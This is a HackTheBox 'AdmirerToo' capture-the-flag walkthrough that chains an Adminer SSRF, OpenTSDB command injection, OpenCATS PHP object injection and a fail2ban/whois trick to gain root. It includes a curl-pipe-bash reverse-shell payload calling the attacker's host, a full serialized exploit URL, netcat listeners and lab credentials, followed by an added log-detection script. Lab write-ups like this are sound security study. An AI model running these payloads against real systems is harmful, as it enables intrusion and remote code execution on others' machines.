HackTheBox – AdmirerToo Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.137
But by observing the source code we can see the following mail address, webmaster@admirer-gallery.htb:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster vhost -k -u http://admirer-gallery.htb -w subdomains-top1million-110000.txt -t 100 -o out
http://db.admirer-gallery.htb/
This is Adminer, an open-source database management tool shipped as a single PHP file.
By observing the POST request sent when we click Enter, we can see the following HTTP POST body:
auth%5Bdriver%5D=server&auth%5Bserver%5D=localhost&auth%5Busername%5D=admirer_ro&auth%5Bpassword%5D=1w4nn4b3adm1r3d2%21&auth%5Bdb%5D=admirer&auth%5Bpermanent%5D=1
We can see the URL-encoded password 1w4nn4b3adm1r3d2%21, which decodes to 1w4nn4b3adm1r3d2!.
Adminer from version 4.0.0 and before 4.7.9 has a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. adminer.php) are affected. This is fixed in version 4.7.9.
If we have SSRF we can try to access port 4242:
https://github.com/llhala/CVE-2021-21311
┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]
└─# nc -lvnp 80
┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]
└─# python3 CVE-2021-21311.py --host 10.10.14.102 --url http://db.admirer-gallery.htb --redirect http://10.10.11.137:4242
As we can see from the response, this is OpenTSDB.
According to https://security.snyk.io/vuln/SNYK-JAVA-NETOPENTSDB-1041751, OpenTSDB is vulnerable to RCE (CVE-2020-35476) by browsing to the following URL:
Let's edit the script CVE-2021-21311.py and change the redirect URL so that the target downloads our reverse shell and runs it. Modify the do_GET method of the handler class so the Location header is hard-coded (the commented-out self.redirect was the script's original value):
    def do_GET(self):
        self.send_response(301)
        # redirect the SSRF to the local OpenTSDB query endpoint instead of self.redirect
        self.send_header('Location', "http://localhost:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.102:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json")  # self.redirect)
        self.end_headers()
┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]
└─# python3 CVE-2021-21311.py --host 10.10.14.102 --url http://db.admirer-gallery.htb --redirect http://10.10.11.137:4242
opentsdb@admirertoo:/$ ls /home
opentsdb@admirertoo:/$ cd /var/www/adminer
opentsdb@admirertoo:/var/www/adminer$ cat plugins/data/servers.php
Let's use the password bQ3u7^AxzcB7qAsxE3 for the user jennifer:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh jennifer@10.10.11.137
jennifer@admirertoo:~$ cd /opt/opencats/
jennifer@admirertoo:/opt/opencats$ ls
jennifer@admirertoo:/opt/opencats$ cat config.php
jennifer@admirertoo:/opt/opencats$ mysql -u cats -padm1r3r0fc4ts -D cats_dev
MariaDB [cats_dev]> show tables;
MariaDB [cats_dev]> select user_name,password from user;
We are not able to crack those hashes using john and rockyou.txt, but we can replace the admin hash with the MD5 of our own password test@123, which is ceb6c970658f31504a901b89dcd3e461:
MariaDB [cats_dev]> update user set password='ceb6c970658f31504a901b89dcd3e461' where user_name='admin';
jennifer@admirertoo:/opt/opencats$ netstat -ant
Password: bQ3u7^AxzcB7qAsxE3
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh -N -L 8889:127.0.0.1:8080 jennifer@10.10.11.137
By browsing to http://localhost:8889 we get:
We can see that it is OpenCATS version 0.9.5.2.
By logging in using our credentials admin:test@123 we get:
OpenCATS is vulnerable to PHP object injection. By leveraging this vulnerability, it is possible to write arbitrary files and execute arbitrary code on the system.
Following the OpenCATS PHP Object Injection to Arbitrary File Write write-up, we can see that we can write a file, but we have no permission to write files into the OpenCATS directory.
We need to chain another exploit.
By enumerating again we can see that we have fail2ban installed:
jennifer@admirertoo:/opt/opencats$ cd vendor/
jennifer@admirertoo:/opt/opencats/vendor$ cat /etc/fail2ban/jail.local
So first let's create a file called payload with the following content (a whois.conf entry whose pattern matches everything and points the whois client at our machine):
}]|. [10.10.14.102]
Following https://snoopysecurity.github.io/web-application-security/2021/01/16/09_opencats_php_object_injection.html, we can write the file with a gadget chain generated by phpggc:
┌──(root㉿kali)-[/home/kali/Downloads/phpggc]
└─# ./phpggc -u --fast-destruct Guzzle/FW1 /usr/local/etc/whois.conf /home/kali/Downloads/payload
Now try to access this URL:
http://localhost:8889/index.php?m=activity&parametersactivity%3AActivityDataGrid=a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A20%3A%22%7D%5D%7C.+%5B10.10.14.102%5D%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A25%3A%22%2Fusr%2Flocal%2Fetc%2Fwhois.conf%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D
After sending it we can see the file whois.conf (the alternative WHOIS servers list for the whois client) has been written:
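As an added defender-side example (not part of this walkthrough), here is a small detector that scans web-server access logs for the two request shapes used above: the OpenTSDB xrange/yrange command injection (CVE-2020-35476) and the OpenCATS PHP object injection carried in a serialized "parameters" value. The log lines are constructed for the example; the range and object checks are the assumptions it makes.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access-log lines; lines 1 and 3 mirror the two attack shapes, 2 and 4 are benign.
SAMPLE_LOG = r'''
10.10.14.102 - - [12/Jan/2022:10:00:01 +0000] "GET /q?start=2000/10/21-00:00:00&m=sum:http.stats.web.hits&yrange=[33:system('curl${IFS}http://10.10.14.102:8000/rev.sh|bash')]&json HTTP/1.1" 200 512
10.10.14.5 - - [12/Jan/2022:10:00:02 +0000] "GET /q?start=1h-ago&m=sum:http.stats.web.hits&yrange=[0:100]&json HTTP/1.1" 200 2048
10.10.14.102 - - [12/Jan/2022:10:00:03 +0000] "GET /index.php?m=activity&parametersactivity%3AActivityDataGrid=a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7B%7D%7D HTTP/1.1" 200 128
10.10.14.5 - - [12/Jan/2022:10:00:04 +0000] "GET /index.php?m=activity&parametersactivity%3AActivityDataGrid=a%3A1%3A%7Bs%3A4%3A%22page%22%3Bi%3A2%3B%7D HTTP/1.1" 200 128
'''

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# CVE-2020-35476: OpenTSDB passes xrange/yrange to gnuplot, so anything beyond a numeric [lo:hi] range is suspect.
SAFE_RANGE = re.compile(r'^\[?-?\d*(\.\d+)?:-?\d*(\.\d+)?\]?$')

def opentsdb_range_injection(path, params):
    if path != '/q':
        return None
    for key in ('xrange', 'yrange'):
        for val in params.get(key, []):
            if not SAFE_RANGE.match(val):
                return f'OpenTSDB {key} is not a numeric range: {val[:60]!r}'
    return None

# OpenCATS unserialize()s DataGrid "parameters*" values; an O:<len>:"<class>" token inside one is the injection signature.
PHP_OBJECT = re.compile(r'O:\d+:"([^"]+)"')

def php_object_injection(params):
    for key, vals in params.items():
        if key.startswith('parameters'):
            for val in vals:
                classes = sorted(set(PHP_OBJECT.findall(val)))
                if classes:
                    return f'serialized PHP object in {key}: {", ".join(classes)}'
    return None

def scan(log_text):
    # Returns (client_ip, path, reason) for every request that matches either pattern.
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        params = parse_qs(url.query, keep_blank_values=True)
        reason = opentsdb_range_injection(url.path, params) or php_object_injection(params)
        if reason:
            findings.append((m['ip'], url.path, reason))
    return findings
```

Running scan(SAMPLE_LOG) flags only lines 1 and 3; the numeric-range check deliberately allows empty bounds such as [0:] because OpenTSDB accepts them.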
jennifer@admirertoo:/opt/opencats/vendor$ ls -ltr /usr/local/etc/
jennifer@admirertoo:/opt/opencats/vendor$ cat /usr/local/etc/whois.conf
┌──(root㉿kali)-[/home/kali/Downloads/phpggc]
└─# ncat -nvlkp 43 -c "cat revshell"
Now let's run whois on the target machine, and we can see it fetches the payload from our machine:
jennifer@admirertoo:/tmp$ whois 10.10.14.102
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 4444
Now let's try to connect using SSH with a wrong password to trigger fail2ban, whose ban action runs whois against our IP:
root@admirertoo:/# cat /root/root.txt